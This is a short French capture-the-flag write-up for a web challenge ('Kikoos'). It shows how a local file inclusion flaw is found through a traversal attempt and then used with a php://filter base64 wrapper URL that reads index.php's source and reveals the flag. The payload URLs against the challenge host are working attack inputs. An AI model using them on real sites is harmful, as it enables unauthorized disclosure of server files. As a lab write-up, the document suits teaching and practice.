WEB 100 - Kikoos

Le challenge est un site web , qui nous montre des photos de voitures qui se déplacent sur la page web.

Après inspection des sources (html) du site web on remarque :

 <title>LFI</title> 

On tente de modifier l'url :

 http://kikoos.ctf.insecurity-insa.fr/?page=../ 

La page réagit en nous renvoyant une indication explicant que le paramètre contient des caractères interdit.

La faille est donc une LFI (Local File Inclusion).

Après plusieurs tentatives de guessing d'une page administrateur on tente de récupérer le code source de la page index.php avec un wrapper PHP.

 http://kikoos.ctf.insecurity-insa.fr/?page=php://filter/read=convert.base64-encode/resource=index.php 

La page nous renvoie le code en base 64 :

PD9waHANCi8vIEZMQUd7TGVha19vZl9GbGFnX2lzX0ltcG9zc2libGU9TEZJfQ0KPz4NCg==
...

On décode le base64 :

FLAG : FLAG{Leak_of_Flag_is_Impossible=LFI}